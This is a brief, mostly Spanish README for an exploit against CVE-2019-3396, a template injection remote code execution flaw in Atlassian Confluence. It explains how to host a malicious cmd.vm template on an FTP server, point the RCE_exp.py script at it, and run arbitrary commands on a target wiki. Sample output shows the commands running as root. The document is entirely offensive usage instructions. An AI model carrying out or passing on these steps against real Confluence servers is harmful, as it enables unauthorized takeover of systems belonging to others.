
CVE-2019-3396 confluence SSTI RCE
CVE-2019-3396 confluence SSTI RCE
1、pon el cmd.vm en tu sitio web (debe usar ftp o https ,http no funciona)
2、modifica RCE_exp.py ,cambia el nombre de archivo = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21)
3、python REC_exp.py http://test.wiki_test.cc:8080 "whoami"
$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)